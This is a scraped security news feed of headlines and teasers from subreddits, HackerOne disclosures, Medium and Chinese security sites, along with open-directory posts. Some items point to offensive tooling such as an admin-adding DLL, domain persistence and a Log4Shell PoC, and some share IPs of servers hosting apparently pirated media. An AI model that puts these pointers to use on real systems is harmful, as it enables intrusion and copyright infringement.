    What is a good CVE/Vuln MANAGEMENT Tool?
    I have put MANAGEMENT in caps for a reason. We already have some scanners (a couple of big names) but nothing to really help MANAGE the vulns. ​ Ideally things I'd like to be able to do: Have workflows based on CVSS eg scores of 7 and greater must be reviewed by X CVE comments Adjusted CVSS for local env mark/detect affected products/components jira integration Ingestion from qualys/other scanners etc Integration with threat intel Sort of like a CVE/vuln/risk specific ticketing system? ​ At the moment we have things in a few different systems/spreadsheets and it's making things a little tough to manage, I'd really like to be able to pull everything together to be able to manage things properly. Should ideally be scanner agnostic. submitted by /u/paracausalhorse [link] [comments]  ( 4 min )
  • Open

    PPTShots - Unintentionally shared data in PowerPoint presentations
    submitted by /u/df_works [link] [comments]  ( 1 min )
    We desperately need a way to rapidly notify people of high-impact vulnerabilities, so I built one
    submitted by /u/sullivanmatt [link] [comments]  ( 5 min )
  • Open

    Subdomain takeover of images.crossinstall.com
    Twitter disclosed a bug submitted by ian: https://hackerone.com/reports/1406335
    ABLE TO TRICK THE VICTIM INTO USING A CRAFTED EMAIL ADDRESS FOR A PARTICULAR SESSION AND THEN LATER TAKE BACK THE ACCOUNT
    Mattermost disclosed a bug submitted by at11zt00: https://hackerone.com/reports/1357013 - Bounty: $150
    Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)
    8x8 disclosed a bug submitted by n1had: https://hackerone.com/reports/1440161
  • Open

    Using Recon-Ng for Recon for Bug Bounty
    Recon-Ng is a great tool for automating your recon workflow and is one of the must have tool for Bug bounties Continue reading on Medium »  ( 1 min )
    How I was able to spoof any Instagram username on Instagram shop
    Summary: i discovered that i can spoof any Instagram username on Instagram shop, with this bug scammers can trick people into thinking… Continue reading on Medium »  ( 1 min )
    Why we use Nmap?
    I clear this topic in 2 points 1.As a hacking or penteration testing. 2.use in bug bounty. 1. As a Hacker- We know that nmap is network… Continue reading on Medium »  ( 1 min )
    Implementing Django-rest API Throttling and Unauthenticated bypass
    In the name of God. Continue reading on InfoSec Write-ups »  ( 4 min )
    Facebook android webview vulnerability : Execute arbitrary javascript (xss) and load arbitrary…
    For detail information read blog below: Continue reading on InfoSec Write-ups »
  • Open

    We’re Organizing Our First Virtual Conference cum Networking Event
    And we want you to be a part!  ( 2 min )
    Day3, Computer Networks — 100DaysofHacking
    Day1 : Installing Kali Linux  ( 4 min )
    Implementing Django-rest API Throttling and Unauthenticated bypass
    In the name of God.  ( 4 min )
    Day2, Navigating Linux — 100DaysofHacking
    Day1 : Installing Kali Linux  ( 5 min )
  • Open

    We’re Organizing Our First Virtual Conference cum Networking Event
    And we want you to be a part!  ( 2 min )
    Day3, Computer Networks — 100DaysofHacking
    Day1 : Installing Kali Linux  ( 4 min )
    Implementing Django-rest API Throttling and Unauthenticated bypass
    In the name of God.  ( 4 min )
    Day2, Navigating Linux — 100DaysofHacking
    Day1 : Installing Kali Linux  ( 5 min )
  • Open

    My new discoveries....
    http://www4.co.black-hawk.ia.us/engineer/ - Road Establishment Records, County Aerials, Road Establishment Records https://www.ndbc.noaa.gov/data/ - So much data! http://167.114.174.132:9092/ - Movies, Series, Music, etc http://162.12.215.254/ - Movies, Android Apps and Games, Software, Tv Series submitted by /u/ManaHoney504 [link] [comments]  ( 1 min )
    Archive.org (9th Time, Jim!)
    Is not an open directory. C’mon, mods, help us out here? edit/ apparently archive.org is technically an open directory. Thanks mod for addressing this and making the community an even better place for us pirates. Rrrrrrrr, matey. edit2/ PEACE AND LOVE, this is not a post directed to anyone in specific. PEACE AND LOVE. submitted by /u/martusfine [link] [comments]  ( 2 min )
    lots of books
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    Is there a better alternative for Mega and Google Drive?
    Please recommend a file sharing service that is better than the two aformentioned. I am uploading books and PDFs concerning translations and machine learning. Something quite unknown to most and not too hassle. Not to keen on bans and removals submitted by /u/Burlack [link] [comments]  ( 2 min )
  • Open

    Fuzzing and exploiting map parser in Teeworlds
    submitted by /u/mmmds [link] [comments]
  • Open

    Beyond the Borrow Checker: Differential Fuzzing
    Article URL: https://tiemoko.com/blog/diff-fuzz/ Comments URL: https://news.ycombinator.com/item?id=29811302 Points: 2 # Comments: 0  ( 14 min )
  • Open

    SecWiki News 2022-01-05 Review
    聚焦算法推荐乱象问题 构建算法安全治理体系 by ourren 好的工作想法从哪里来 by ourren 开源情报及其在下一代网络安全中的应用---文献综述 by ourren 商品图谱构建与实体对齐 by ourren 网络爬虫公司可能触犯哪些罪名 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    KNOW YOUR PUBLIC PRESENCE ONLINE
    Day in and day out people sign up for services and fast forward loose tracks of these services because they don’t use them. It will be… Continue reading on Medium »  ( 2 min )
    The OSINT-ification of ISIS on the Dark Web
    *Note: This article was originally published by the author on March 11, 2019. Continue reading on Medium »  ( 11 min )
  • Open

    浅析利用进程实现文件控制
    在《关于进程创建分析》一文中,对一些linux命令以及进程创建、进程状态做了讲解,还做了几个小lab。在本篇文章中,将继续延续上篇文章的知识,讲解一些文件操作指令并做一些小lab。  ( 1 min )
    国家网信办拟修订《移动互联网应用程序信息服务管理规定》
    2022年1月5日,国家互联网信息办公室对2016年8月1日正式施行的《移动互联网应用程序信息服务管理规定》进行了修订。
    FreeBuf 早报 | DatPiff 数据泄露影响数百万人;提高反诈意识,别让共享屏幕骗局得手
    国家互联网信息办公室拟对已施行的《移动互联网应用程序信息服务管理规定》进行了修订,现向社会公开征求意见。  ( 1 min )
    恶意软件Purple Fox 伪装成 Telegram 安装程序传播
    与其他恶意软件的传播方式不同,Purple Fox采用的新传播方式,使得其隐匿性进一步提高。  ( 1 min )
    盘点 2021 年严重的网络攻击事件
    盘点一下2021年全球部分实体遭受的网络攻击事件。  ( 1 min )
    你在看视频,黑客在窃取你的信用卡信息
    在此次供应链攻击事件中,Unit42安全团队总共发现了 100 多个受此攻击活动影响的房地产网站,这意味着攻击非常成功。  ( 1 min )
    美国无线运营商 UScellular批露了发生在年末的数据泄露事件
    美国最大的无线运营商之一——UScellular披露了一起发生在去年12月份的数据泄露事件。
  • Open

    FTC warns companies to remediate Log4j security vulnerability
    Article URL: https://www.ftc.gov/news-events/blogs/techftc/2022/01/ftc-warns-companies-remediate-log4j-security-vulnerability Comments URL: https://news.ycombinator.com/item?id=29806997 Points: 2 # Comments: 1  ( 5 min )

  • Open

    How to change my public ip manually
    I already checked that my ip is dynamic but it seems to change every long time, does anyone know how to make it change manually? I have already spent about 1 month and tried restarting the router but it did not work submitted by /u/Shark233F [link] [comments]  ( 1 min )
    Was I DDOS attacked?
    I was browsing the PHP files on a website and kept getting remote force disconnected, and after reconnecting a few times suddenly nothing would load, not even other sites like Google. Switching over to a different network and going back to the site, it worked fine. Can't confirm but it also looked like the load on the entire previous network went up. The acronyms start to run together with trying to differentiate DOS, DDOS, and DNS, DNS Flood, Ipv4, IPv6, and DDNS, so I'm wondering if this was a DDOS attack on my specific DNS. Did they try to flood the IP with traffic to stop connectivity to the internet, or was something else going on? The website was public and anyone could see the stuff, but they must have been monitoring the traffic somehow and decided to disconnect what I was looking at, but after changing over networks everything was still up in the exact same place. The network I was on was probably bigger than theirs, being some random site, and it didn't look like they brought down the whole network, so it's strange that even other sites wouldn't load. I ran a WHOIS on the site and it turned out to be some Namecheap domain running on Cloudfare server registered under a fake address, and's only been up for about 14 months. submitted by /u/NoFilterr [link] [comments]  ( 1 min )
    State-of-the-art models or techniques applies to InfoSec?
    Hello, I'd like to know about some good and innovative practices that you can't find in standard guidelines like the ISO 27001 for example. The thing is, my company is stuck in the early 2000s with a Zero Trust policy for everything(which can be bypassed easily) and this is just a pain in the ass, no efficient at all considering it just makes workers being 100% dependent to IT for any requeriment So I want to ask for your advice submitted by /u/Key-Clothes-152 [link] [comments]  ( 1 min )
    Zscaler's Cloud Workload Communications protection
    Happy new Year everyone, Wonder if anyone had any experience with this so far? https://www.zscaler.com/press/zscaler-extends-its-proven-zero-trust-exchange-platform-deliver-zero-trust-workloads submitted by /u/killb0p [link] [comments]
    We all love MFA - is it a good idea to keep Google Authenticator addon in Chrome / Web Browser?
    I'm always thinking twice before installing any addon in my web browser. Very often removed it after I used it. However, there are addons designed to stay for longer. Like, google authenticator addon and alike. Q: For sake of security, is it a good idea to keep Google Authenticator addon in chrome or just forget about it and stick to the smartphone / pass-manager? submitted by /u/bitsailor [link] [comments]  ( 2 min )
    Proxy scanning(xpost r/hacking)
    so i just started looking into 0.0.0.0/0 scanning and it has shown a lot of potential so far with application like zmap and zgrab, had a lot of fun joining random minecraft server, but i would like to explore a more practical, usefull you might say, approach. when i think of scanning the internet other than vulnerable DNS servers, i think about those looooong ass free proxy lists sitting there in the open. I know, i know those are not anonymous, but i was wondering, how the duck do they get those lists, they are obviously not their servers, and to add to that proxies often have random ports, how do you scan for a service that has random ports, even then if you find a server with a port 80 or 8080 it could just be an http server out there, how do you identify it is an actual proxy, banner perhaps? ps: pls do not point out proprietary software or any if you can, i'm trying to learn here (TL;DR) i want a proxy list, made by me, and im struggling, pls help submitted by /u/filippobob [link] [comments]  ( 1 min )
    Suricata: anomaly-based detection?
    i tried Googling this, but am getting mixed messaging. It's signature based, but can detect anomalies? submitted by /u/albertcuy [link] [comments]  ( 1 min )
    tcpdump: how to keep packets that contain a substring only
    I have the following tcpdump command: sudo tcpdump -i eth0 -nn -A -s 65535 -w somepackets2.cap "(port not 443) && (less 15) && (tcp) && (greater 30)", but I want to add on another "and" condition that keeps only packets that contain "mysubstring". How can I do that? submitted by /u/social-bleach [link] [comments]  ( 1 min )
    Phishing email sent from own mail? Email spoofed or hacked?
    So, I received one those threat emails where they say my device is compromised, and the sender is myself. Phone is fine, no signs of viruses, I'm careful as well, have Adblock, have HTTPS everywhere. Google lists no suspicious activity, no traces that my mail was hacked. I changed passwords anyway, but can't help but be paranoid. I know it's possible to spoof an email address, and Google itself says the sender may not be the address shown. I was trying to see the original header with the help of a howtogeek guide, but there's no email address other than my own. Mail says it's a zero click vulnerability, that I was hacked through a website, but it all seems very unlikely. Can anyone please elaborate on this? My mail was not hacked? I'm not on have I been pwned, which is why I was extra concerned: how the heck do they have my email? submitted by /u/Unluckyclover_ [link] [comments]  ( 1 min )
    Do integer overflows also buffer overflow?
    Hi, I'm currently learning about c and the classic vulnerabilities that arise. Right now buffer overflows ​ So, just to sum up my understanding, an example like this will overflow because 'ab' is of two bytes is too big to store in the last byte of "buff": char buff[10]; buff[9] = 'ab'; The wiki article about buffer overflows define them as follows: "while writing data) to a buffer, overruns the buffer's boundary" This got me thinking that this sounds a lot like integer overflows. Trying to put something into a container that it cannot contain. But let's take the following example of a integer overflow (I use unsigned char for having most simple case): unsigned char c = 255; unsigned char cc = c + 1; Ok, so the single byte of the char cannot contain a value higher than 255, and thus it does modulo. And my understanding of integer overflow is that internally, the computer tries to put a 1 to the left of the current numbe, such that if 255 looks like this: 11111111 then it simply assumes that there exists a place that represents 256, and tries to create this binary number: 100000000 But there is no such bit, and therefore the number just becomes 00000000. But the single 1 that is lost doesnt that go somewhere in memory? For that reason, my thought was that integer overflows had have to also contain buffer overflows. Is this true? ​ Further thoughts At the core of the issue is a question of what actually constitutes a buffer in c. You could maybe argue that this problem would have been better suited for r/learnprogramming. But yeah, my guess is that it depends on whether or not a certain variable counts as buffers. is a int a buffer? is a char[]? etc? submitted by /u/GarseBo [link] [comments]  ( 2 min )
    What position would be most qualified for hacking?
    From reading this I'm thinking Security Analyst would be closest https://www.cs.seas.gwu.edu/cybersecurity-roles-and-job-titles submitted by /u/cookred [link] [comments]
  • Open

    The Story Of How I Bypass MAC Filter
    Hello everyone, Continue reading on Medium »  ( 2 min )
    Day3, Computer Networks — 100DaysofHacking
    Day1 : Installing Kali Linux Continue reading on InfoSec Write-ups »  ( 3 min )
    Accessing GoDaddy internal instance through an email logic bug.
    Hey All, Continue reading on System Weakness »  ( 3 min )
    Accessing GoDaddy internal instance through an email logic bug.
    Hey All, Continue reading on Medium »  ( 2 min )
    How to freely borrow all the TVL from the Jet Protocol
    Recently I discovered a critical vulnerability that could possibly lead to the loss of funds in the smart contract of Jet Protocol, a… Continue reading on Medium »  ( 3 min )
    Misconfiguration OAuth Lead Account Takeover
    Assalamuallaikum Wr.Wb Hello friends I want to explain about the bug bounty that I got in 2020, this vulnerability lies in the weak OAuth Continue reading on Medium »  ( 1 min )
    SQL Injection - The File Upload Playground
    Summary : Continue reading on Medium »  ( 3 min )
    Spotlight: Earn Bitcoin While Browsing The Web On Desktop And Mobile
    Is it too good to be true? Well, join me on my quest to find out. Continue reading on Medium »
  • Open

    British Tv-Episodes of The Avengers, Bergerac, TOTP, The Professionals, Coronation Street, Dr Who. (1 seri Doomwatch, Dr Who (inferno)
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Dr who literature
    submitted by /u/International_Milk_1 [link] [comments]
    Channel for old british tv stuff, mostly it would seem for kids. eg Paddinngton bear, but also dads army, one foot in the grave, etc etc.
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    I have hundreds of *credible* books on corruption, parapolitics, economic warfare, propaganda, and state crimes. I’d like to share them but they are on an iCloud folder and too large to download. Is there anyway to transfer directly to Mega, please?
    submitted by /u/Few_Tumbleweed7151 [link] [comments]  ( 2 min )
    Smallish list of mostly Japanese movie and tv stuff. Some raw, some with english subs, some english dubs.
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    FTP: Misc IBM software, marketing & training materials, annual reports, etc from 1994 to present
    submitted by /u/xuvatilavv [link] [comments]
    BSG Battlestar Galactica 720p Complete 2003-2012 Extras Subs
    http://37.187.18.191/tv/BSG%20Battlestar%20Galactica%20720p%20Complete%202003-2012%20Extras%20Subs/ submitted by /u/SeniorAlbatross [link] [comments]
    Anime Fansubs
    submitted by /u/International_Milk_1 [link] [comments]
    David Bowie Bootlegs
    submitted by /u/International_Milk_1 [link] [comments]
  • Open

    OPEN REDIRECT
    Nutanix disclosed a bug submitted by kauenavarro: https://hackerone.com/reports/1369806
    Buffer overflow in req_parsebody method in lua_request.c
    Internet Bug Bounty disclosed a bug submitted by chamal: https://hackerone.com/reports/1434056 - Bounty: $2000
    %0A (New line) and limitness URL leads to DoS at all system [Main adress (https://www.acronis.com/)]
    Acronis disclosed a bug submitted by plantos: https://hackerone.com/reports/1382448
  • Open

    Sears Garage Door Signal Reverse Engineering
    submitted by /u/mdulin2 [link] [comments]  ( 1 min )
    Domain Persistence - AdminSDHolder
    submitted by /u/netbiosX [link] [comments]
    Cache Poisoning at Scale
    submitted by /u/albinowax [link] [comments]
  • Open

    SecWiki News 2022-01-04 Review
    CodeAnalysis: 腾讯 Static Code Analysis by ourren 网络安全标准实践指南——网络数据分类分级指引 by ourren 扛住100亿次红包请求的后端架构设计 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Top books to learn Android Hacking & Security
    submitted by /u/pat_ventuzelo [link] [comments]
  • Open

    《网络安全审查办法》17项要点速读
    《网络安全审查办法》发布,这些要点请尽快了解。  ( 1 min )
    FreeBuf 早报 | 葡萄牙最大媒体集团遭勒索攻击;以色列媒体在苏莱曼尼遇害纪念日遭攻击
    全球动态1.以色列媒体在苏莱曼尼遇害周年纪念日遭到黑客攻击在伊朗伊斯兰革命卫队指挥官苏莱曼尼遇害周年纪念日,威胁行为者入侵了以色列媒体《耶路撒冷邮报》英文网站和《晚祷报》 (Maariv)的推特帐户。 [外刊-阅读原文]2.希腊黑客“攻陷”NASA局长社交账号美国宇航局(NASA)局长 Parimal Kopardekar 个人 Twitter 账户遭遇希腊黑客入侵。黑客组织的一位发言人称,此次把  ( 1 min )
    专访默安科技云舒:将安全融入开发,如春雨润物细无声
    云舒,默安科技联合创始人、CTO,16年以上安全从业经验、行业大V,欺骗防御理念的重要布道者。  ( 1 min )
    2021年最值得关注的五大安全话题:你关心的均有上榜
    这或许表明在新的工作方式趋于“常态化”后,外界更热衷于关注网络犯罪的创新。  ( 1 min )
    安全态势感知的前世今生
    安全态势感知的出现是国家安全战略发展的必然。  ( 1 min )
    DNS重绑定攻击研究
    每点击一个可疑的链接,DNS重绑定攻击除了利用存在DNS重绑定漏洞的应用外,甚至可能会导致攻击者瞬间控制你连接家庭网络的其它互联设备。  ( 1 min )
    Broward Health 披露影响 130 多万人的数据泄露事件
    值得注意的是,入侵点被确定为第三方医疗提供商,该提供商通过接入医疗系统提供服务,因此拥有一定的访问权限。  ( 1 min )
    2022年第一天,微软Exchange无法发送电子邮件
    新年伊始,万象更新,但在2022年的第一天,微软却给大家开了一个不大不小的“玩笑”。  ( 1 min )
    希腊黑客“攻陷”NASA局长社交账号
    美国宇航局(NASA)局长Parimal Kopardekar的Twitter账户遭遇希腊黑客入侵。  ( 1 min )
    应急响应之外联请求分析
    针对DNS恶意请求解析事件进行处理分析  ( 1 min )
    2021年流行勒索软件盘点
    2021年全球制造业、服务业、建筑、金融、能源、医疗、工控和政府组织机构等频遭勒索软件攻击,给全球产业产值造成严重损失。  ( 1 min )
    苹果iOS曝doorLock漏洞,能让手机“变砖”
    在Apple HomeKit 中发现了一个名为“doorLock”的新型持续拒绝服务漏洞,影响的系统版本从IOS14.7到IOS15.2。  ( 1 min )
    网信办等四部门发布《互联网信息服务算法推荐管理规定》
    《规定》明确“应用算法推荐技术”,是指利用生成合成类、个性化推送类、排序精选类、检索过滤类、调度决策类等算法技术向用户提供信息。
    十三部门修订发布《网络安全审查办法》,2022年2月15日施行
    《办法》明确掌握超过100万用户个人信息的网络平台运营者赴国外上市必须向网络安全审查办公室申报网络安全审查。
    2021勒索病毒大盘点
    勒索病毒为何有这么大的能量,让所有行业“谈虎色变”?面对勒索病毒,难道只能“躺平”?  ( 1 min )
    实战中的越权攻击总结
    本篇是对今年渗透测试遇到的越权攻击进行一下总结,各位师傅共同学习,若有不足或建议,也望大家及时提出。  ( 1 min )
  • Open

    Domain Persistence – AdminSDHolder
    Utilizing existing Microsoft features for offensive operations is very common during red team assessments as it provides the opportunity to blend in with the environment… Continue reading → Domain Persistence – AdminSDHolder  ( 3 min )
    Domain Persistence – AdminSDHolder
    Utilizing existing Microsoft features for offensive operations is very common during red team assessments as it provides the opportunity to blend in with the environment… Continue reading → Domain Persistence – AdminSDHolder  ( 3 min )
  • Open

    Solving OSINT Dojo’s 2022’s first quiz
    Today I am solving first 2022 quiz post by #OSINTDojo Continue reading on Medium »  ( 2 min )
    Claim: China operated black jail in Dubai — Open Source Analysis
    In August 2021 Associated Press (AP) reported a claim that a Chinese woman was held at a “Chinese-run secret detention facility ” in Dubai Continue reading on Medium »  ( 4 min )
  • Open

    Misconfiguration OAuth Lead Account Takeover
    Assalamuallaikum Wr.Wb Hello friends I want to explain about the bug bounty that I got in 2020, this vulnerability lies in the weak OAuth Continue reading on Medium »  ( 1 min )
  • Open

    December 2021 update for Netsparker Standard 6.3
    We’re delighted to announce the December 2021 update for Netsparker Standard 6.3. The highlights of this release are software composition analysis (SCA), the OWASP Top Ten 2021 Report, and support for scanning GraphQL APIs. READ MORE  ( 2 min )
  • Open

    Simple DLL that creates and adds an user to the local Administrators group
    A simple C++ DLL that creates and add a user to the Local #Administrator group. Useful when dealing with privilege escalation on Windows to gain local administrator access and do not care of opsec. Repo: https://github.com/notdodo/adduser-dll submitted by /u/d_o_d_o_ [link] [comments]  ( 1 min )
  • Open

    doorLock: HomeKit DoS/semi-bricking Vulnerability (Via Home Invitation)
    Article URL: https://twitter.com/trevorspiniolas/status/1477185285784051712 Comments URL: https://news.ycombinator.com/item?id=29793176 Points: 2 # Comments: 1  ( 1 min )
  • Open

    Previse from HackTheBox — Detailed Walkthrough
    Showing all the tools and techniques needed to complete the box. Continue reading on InfoSec Write-ups »  ( 5 min )
    TryHackme — Cross-Site Scripting
    Malicious Script Injection  ( 3 min )
    Proof of concept: zero-day- log4j RCE
    What is log4j?  ( 3 min )
    OWASP-Access Control Vulnerability
    This article is going to focus on Access control security and Broken Access control, it will summarize the thoughts, procedures and…  ( 6 min )
  • Open

    Previse from HackTheBox — Detailed Walkthrough
    Showing all the tools and techniques needed to complete the box. Continue reading on InfoSec Write-ups »  ( 5 min )
    TryHackme — Cross-Site Scripting
    Malicious Script Injection  ( 3 min )
    Proof of concept: zero-day- log4j RCE
    What is log4j?  ( 3 min )
    OWASP-Access Control Vulnerability
    This article is going to focus on Access control security and Broken Access control, it will summarize the thoughts, procedures and…  ( 6 min )

  • Open

    ASK: What should I look in a Masters Program before opting it
    Hey everyone, I have been thinking of pursuing a masters in cybersecurity. I love tinkering with low level stuff, especially embedded systems and exploit development. But I don't know if the universities offer courses targeting them. Can the community suggest me some good unis that I can apply too based on my inclination. PS: Can someone also take a look at my SOP, I don't have anyone who can proofread my SOP. submitted by /u/sidhu97ss [link] [comments]  ( 1 min )
  • Open

    Basic Overview: Active Directory Hacking
    Introduction Continue reading on Medium »  ( 3 min )
    TryHackMe — Advent of Cyber 3 (2021) WriteUp
    WriteUp for all Challenges in THM Advent of Cyber 3 Continue reading on Medium »  ( 16 min )
  • Open

    Disney Channel Stuff+
    submitted by /u/International_Milk_1 [link] [comments]
    Dr Who (The original series) Seasons 1-8.
    submitted by /u/International_Milk_1 [link] [comments]
    Some old movies and Tv series
    submitted by /u/International_Milk_1 [link] [comments]
    Columbo episodes
    submitted by /u/International_Milk_1 [link] [comments]
    Mixture off BBC Radio stuff. Fact and Fiction.
    submitted by /u/International_Milk_1 [link] [comments]
    movies for the film buff
    submitted by /u/International_Milk_1 [link] [comments]
    archive.org link to Japanese movies, tv series with english subtitles filtered by title.
    submitted by /u/International_Milk_1 [link] [comments]
    large dex
    http://90.146.184.46/ submitted by /u/Dagad0s [link] [comments]
    Musikk (FLAC + MP3)
    https://85.166.158.78/RaidNAS/Lyd/Musikk/ [DIR] Atreyu/ 11-Oct-2019 23:56 - [DIR] Avenged.Sevenfold/ 08-Nov-2019 23:46 - [DIR] Bullet.For.My.Valentine/ 08-Nov-2019 23:52 - [DIR] Metallica/ 12-Oct-2019 00:06 - [DIR] Nirvana/ 12-Oct-2019 00:06 - [DIR] Papa.Roach/ 12-Oct-2019 00:08 - [DIR] Pink.Floyd/ 12-Oct-2019 00:13 - submitted by /u/Dagad0s [link] [comments]
    mostly Metallica / Nightwish (largely FLAC 24/96)
    https://seisho.us/swap/ submitted by /u/Dagad0s [link] [comments]  ( 1 min )
    Sheetmusic for (wind)band
    Nice collection of sheetmusic (scores and parts) for (wind)band https://camdencommunityband.org.au/wp-content/uploads/2019/07/ submitted by /u/notmcgvien [link] [comments]  ( 1 min )
    nice selection (FLAC \ MP3)
    http://51.198.90.160/resources/Music/ submitted by /u/Dagad0s [link] [comments]
    I made an OD browser with IMDB ratings built in
    Hey r/opendirectories! ​ I made a web app that helps me identify poorly rated movies in open directories so I can avoid them. This post isn't to promote my project or anything -- which is why I am not disclosing the name or sharing the link to the git repo -- I am writing to gather feedback and to see if people would be interested in using it when it becomes mature enough one day. ​ ​ https://i.redd.it/nblwcs660f981.gif ​ First off, why I made this tool and what the tool does: ​ I am a casual OD user who downloads just a couple movies at a time. It's not difficult to guess that I do a lot of Google searches to decide on what I want to download -- sometimes you can go through 20+ poorly reviewed movies before seeing something decent. I wanted something I can use to rule out bad mov…  ( 3 min )
    An MSX site that links to a bunch of directories.
    Just scroll down to enjoy this neat little rabbithole. https://www.file-hunter.com submitted by /u/EmuAnon34 [link] [comments]
    "New Wave Theatre" - Episodes 1 through 25: Internet Archive. Live music from the early 1980s on Night Flight
    submitted by /u/FireHole [link] [comments]
  • Open

    Log4Shell: RCE 0-day exploit on
    U.S. Dept Of Defense disclosed a bug submitted by mr_x_strange: https://hackerone.com/reports/1429014
  • Open

    What was 2021 like for your SOC?
    What was 2021 like for your SOC? Any workflow or tool changes that made an impact? Did your team handle more or less incidents? submitted by /u/wowneatlookatthat [link] [comments]
    Phone camera related question
    How do I find out whether my phone's camera is turned on or off? I don't have any sort of LED indicator next to my phone's camera. Is there any other way? To see whether camera is being used or not? If I'm using (for example: Snapchat) to take a picture/video, then can other camera apps on my phone like Tiktok/Kiradroid/WhatsApp camera also be turned on simultaneously ? Is it possible for other camera apps to see what I'm recording on Snapchat? note- On Tiktok's permission : run foreground service is mentioned. submitted by /u/hamza_37 [link] [comments]  ( 1 min )
    Is it safe to hide insecure servers in intranet?
    Is it generally safe to hide insecure servers(like a REST API server without authentication, no JWT no basic Auth) in intranet(or docker network without publishing the port)? What kind of risk will I be exposed to? Let say I have server A, B and C, and I will publish and expose server A to public, and I only want server B and C to be reached by server A. Is it safe to keep server B and C in intranet(server A will be in that intranet as well, but exposed to public)? submitted by /u/hksparrowboy [link] [comments]  ( 2 min )
    Call listening symptoms, spy tech, dual sim or cloning ? How can one get proof of this that is admissible as evidence ?
    I am being stalked by my ex pretty sure she has screwed herself a army of tec savy individuals to help her. It’s been almost 2 years I just want to get proof or get her to leave me alone. So if someone was spoofing my phone listening to my calls is it a possibility that if they hung up before I was off the phone I could get a incoming call from the person I was talking to currently and there phone would suddenly start ringing like they called me again ? This phenomena has happened 3-5 times to me before I realized it has only happened sense my ex moved out she somehow had my phone cloned and was following me all over the internet as she could see where I was posting. I don’t think she could modify things on the phone like screen shots but someone else handles package delivery. I got a new Samsung phone and within three days I had four apps that had been sideloaded on there one of them the Verizon app that allows you to supposedly hack a phone I of course deleted them. I watched the Google family app appear miraculously onto my phone screen at a concert while Trying to discern if that was my ex standing approximately 40 yards away who should’ve been home with our daughter. I moved into see if it was her and she hid behind her hair while walking 20 yards ahead and exited the concert. Pretty sure she has contacted clients and told them outlandish lies to create problems, women I was talking to, follows me all over the internet posting where I post creating accounts where I have accounts all in the name of narc psychopath bs it was bad enough all the cheating that came to light and the mental abuse when we lived together now this shit. Any help would be great thanks. submitted by /u/itwasEMOTIONALmurder [link] [comments]  ( 4 min )
    ELI5: Why can a message not be decrypted with the public key in in PKI?
    Apologies if this is the incorrect sub for this, but this is the only one I found that I thought would fit. I’m studying for Sec+, and currently trying to understand the PKI and asymmetric encryption protocols. Say for example I encrypt a message using google’s public key to Google.com, and a MITM intercepts it. Why can’t the MITM decrypt the message using the public key when it was encrypted using the public key in the first place? Why does it have to be decrypted using the private key? Thank you for the help! submitted by /u/bookandrelease [link] [comments]  ( 3 min )
  • Open

    Module-1 | Introduction -Pentesting & Bypassing Cloud Web Application Firewall of Major Clouds
    Why you should not trust the cloud WAF? Continue reading on Medium »  ( 3 min )
    100%OFF | Pentesters Practical Approach for Bug Hunting and Bug Bounty
    Welcome to this course on Pentesters Practical Approach for Bug Hunting and Bug Bounty. To enjoy this course, you need a positive attitude Continue reading on Medium »  ( 1 min )
    Bug Report Update
    As our testnet and bugbounty continues to thrive, we are very grateful for the active participation of our community to fix any and every… Continue reading on Medium »  ( 1 min )
    Story of YouTube’s Unfixable Ads Bypass
    Hello there! I hope everything is going well with you; today I will talk about my YouTube Ads bypass. Continue reading on Medium »  ( 3 min )
    P5 to P1: Intresting Account Takeover
    Hello Guys, Continue reading on Medium »  ( 2 min )
    IDOR leads to leak Private Details
    I Wish you Merry Christmas & happy new year to you readers. May this year bring us nothing more than love, joy, happiness, P1,P2… Continue reading on InfoSec Write-ups »  ( 2 min )
  • Open

    Best free utility to take an image of an iOS device?
    Hi there, I’m learning how to use Autopsy, and it has an iOS ingest module (iLEAPP). iLEAPP will accept a compressed .tar/.zip file or an iTunes backup. What’s the best way to capture an image of an iOS device? Would an iTunes backup encompass almost everything (excluding Health data, etc.), or is there a better utility? Thanks! submitted by /u/hamsterbilly [link] [comments]  ( 1 min )
  • Open

    A Beginner's Story on How a Cheapo Standard Issue Router was hacked.
    submitted by /u/secnigma [link] [comments]  ( 1 min )
    One of my better-documented exploits, CVE-2017-5816 whitepaper
    submitted by /u/oxagast [link] [comments]
    Vulnerability in log4j 2.17.0 more hype than substance | LunaSec
    submitted by /u/breadchris [link] [comments]  ( 1 min )
    /r/netsec's Q1 2022 Information Security Hiring Thread
    Overview If you have open positions at your company for information security professionals and would like to hire from the /r/netsec user base, please leave a comment detailing any open job listings at your company. We would also like to encourage you to post internship positions as well. Many of our readers are currently in school or are just finishing their education. Please reserve top level comments for those posting open positions. Rules & Guidelines Include the company name in the post. If you want to be topsykret, go recruit elsewhere. Include the geographic location of the position along with the availability of relocation assistance or remote work. If you are a third party recruiter, you must disclose this in your posting. Please be thorough and upfront with the position details. Use of non-hr'd (realistic) requirements is encouraged. While it's fine to link to the position on your companies website, provide the important details in the comment. Mention if applicants should apply officially through HR, or directly through you. Please clearly list citizenship, visa, and security clearance requirements. You can see an example of acceptable posts by perusing past hiring threads. Feedback Feedback and suggestions are welcome, but please don't hijack this thread (use moderator mail instead.) submitted by /u/ranok [link] [comments]  ( 2 min )
    Malicious Telegram Installer Drops Purple Fox Rootkit
    submitted by /u/woja111 [link] [comments]  ( 1 min )
    google/log4jscanner: A log4j vulnerability filesystem scanner and Go package for analyzing JAR files.
    submitted by /u/maryetan [link] [comments]
    C++ Memory Corruption (std::vector) - part 2
    submitted by /u/Gallus [link] [comments]  ( 1 min )
  • Open

    Vulnerability in Log4j 2.17.0 more hype than substance
    Article URL: https://www.lunasec.io/docs/blog/log4j-hype-train/ Comments URL: https://news.ycombinator.com/item?id=29782471 Points: 2 # Comments: 0  ( 6 min )
  • Open

    SecWiki News 2022-01-03 Review
    SecWiki周刊(第409期) by ourren QingScan: 漏洞扫描器粘合剂 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Optimizing Windows Function Resolving: A Case Study Into GetProcAddress - phasetw0
    submitted by /u/dmchell [link] [comments]
    airbus-cert/Invoke-Bof: Load any Beacon Object File using Powershell!
    submitted by /u/dmchell [link] [comments]
  • Open

    NOTE: I assume that the keys have been exchanged using any key exchange protocol.
